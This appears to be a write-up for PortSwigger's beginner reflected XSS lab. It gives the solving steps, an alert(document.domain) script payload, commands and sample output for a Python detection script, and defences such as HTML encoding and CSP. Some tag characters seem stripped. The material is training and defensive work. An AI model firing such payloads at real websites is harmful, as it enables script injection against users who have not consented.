## https://sploitus.com/exploit?id=81A6158E-0E37-5767-9802-0D9287FC1257
# Lab: Reflected XSS in HTML context without encoding
> **Difficulty**: APPRENTICE
> **Source**: [PortSwigger Web Security Academy](https://portswigger.net/web-security/cross-site-scripting/reflected/lab-html-context-nothing-encoded)
---
## Description of the vulnerability
This lab demonstrates the most basic form of **Reflected XSS**. The server directly embeds the user’s search query into the HTML response, without any encoding or filtering. This allows attackers to execute arbitrary JavaScript in the victim’s browser.
---
## Attack process
1. Open the search box on the lab homepage.
2. Enter the following payload and click **Search**:
```html
alert(document.domain)
```
3. The server embeds the payload unchanged into the HTML. The browser parses and executes the `alert` tag.
4. An `alert` dialog box is displayed. The lab is marked as **Solved**.
---
## Detection script `xss_lab1.py`
This automated script sends an XSS payload and checks whether the response contains unencoded payloads.
### Environment requirements
- Python 3.x (No third-party packages required)
### Creating a virtual environment
```powershell
python -m venv venv
.\venv\Scripts\Activate.ps1
```
### Running the script
```powershell
python xss_lab1.py https://.web-security-academy.net/
```
### Example script output
```
============================================================
XSS Detection — Reflected XSS (HTML context, no encoding)
============================================================
Target URL: https://xxxx.web-security-academy.net/
Payload: alert(document.domain)
Query URL: https://xxxx.web-security-academy.net/?search=%3Cscript%3Ealert%28document.domain%29%3E
------------------------------------------------------------
HTTP Status Code: 200
[Vulnerability confirmed] Unencoded payload found in the response! There is a Reflected XSS vulnerability:
alert(document.domain)
Conclusion: ✅ The XSS payload was directly reflected in the front end, without any encoding or filtering. Attackers can execute arbitrary JavaScript in the victim’s browser.
```
---
## Recommendations for protection
| Method | Description |
|-------|--------------|
| **HTML entity encoding** | Convert ``, `"`, `'`, `&` to their corresponding entities before outputting them to HTML. |
| **Content Security Policy (CSP)** | Restrict the sources of executable scripts. |
| **Input validation** | Reject or clean inputs containing special characters like `&`.
---
## File structure
```
. ├── xss_lab1.py # Automated XSS detection script
├── README.md # This readme file
└── ATTACK_REPORT.md # Vulnerability report
```
[source-iocs-preserved url=https://xxxx.web-security-academy.net/?search=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]